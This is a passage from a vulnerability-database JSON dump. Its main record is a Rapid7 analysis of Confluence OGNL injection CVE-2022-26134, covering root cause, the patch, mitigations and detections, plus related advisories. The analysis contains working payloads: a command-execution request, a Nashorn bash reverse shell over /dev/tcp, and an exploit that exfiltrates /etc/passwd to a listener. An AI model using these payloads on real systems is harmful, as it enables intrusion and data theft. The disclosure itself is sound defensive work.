X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/10/metasploit-pumpkin-1-1.jpg)\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T15:01:26", "description": "![Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084](https://blog.rapid7.com/content/images/2021/09/confluence-server.jpg)\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light._\n\nOn August 25, 2021, Atlassian [published details](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) on [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nProof-of-concept exploit code has been publicly available since August 31, 2021, and both Rapid7 and community researchers have observed active exploitation as of September 2. **Organizations that have not patched this Confluence Server and Confluence Data Center vulnerability should do so on an emergency basis.**\n\nFor a complete list of fixed versions, see [Atlassian\u2019s advisory here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>).\n\nFor full vulnerability analysis, including triggers and check information, see [Rapid7\u2019s analysis in AttackerKB](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>).\n\n## Rapid7 customers\n\nRapid7's Managed Detection and Response (MDR) team has observed active exploitation against vulnerable Confluence targets. InsightIDR customers should ensure that the Insight Agent is installed on all Confluence servers to maximize post-compromise detection visibility.\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2021-26084](<https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/>) with remote vulnerability checks as of the August 26, 2021 content release.\n\n## Updates\n\n**September 2, 2021:** \nThe Rapid7 Threat Detection & Response team added or updated the following detections to InsightIDR to help you identify successful exploitation of this vulnerability:\n\n * **Suspicious Process - Curl Downloading Shell Script** detects when the Curl utility is being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.\n * **Suspicious Process - Confluence Java App Launching Processes** identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084, a vulnerability for Confluence disclosed in August 2021 which can allow execution of arbitrary processes.\n * **Suspicious Process - Common Compromised Linux Webserver Commands** identifies commands that Rapid7 has observed being run on compromised Linux webservers.\n\n**September 3, 2021:** \nAttacks are continuing to increase, therefore Rapid7 has updated the patching priority to "patch on an emergency basis."\n\nThe US Cyber Command has tweeted guidance asking for organizations to ["patch immediately"](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) as "this cannot wait until after the weekend."\n\nCISA has also released a [ransomware awareness guide](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) for holidays and weekends.\n\nCurrent attacks have been focused on deploying coin miners, but the pivot to deploying ransomware may not take long.\n\n**September 7, 2021:** \nAtlassian has updated their [advisory on CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) to note that the vulnerability is exploitable by unauthenticated attackers _regardless of configuration._ Widespread exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-09-02T15:44:36", "type": "rapid7blog", "title": "Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T15:44:36", "id": "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "href": "https://blog.rapid7.com/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-01-27T07:37:58", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:30:10", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084"], "modified": "2021-11-23T15:51:23", "id": "CD8CABD7-BE65-5434-B682-F73ABA737C65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 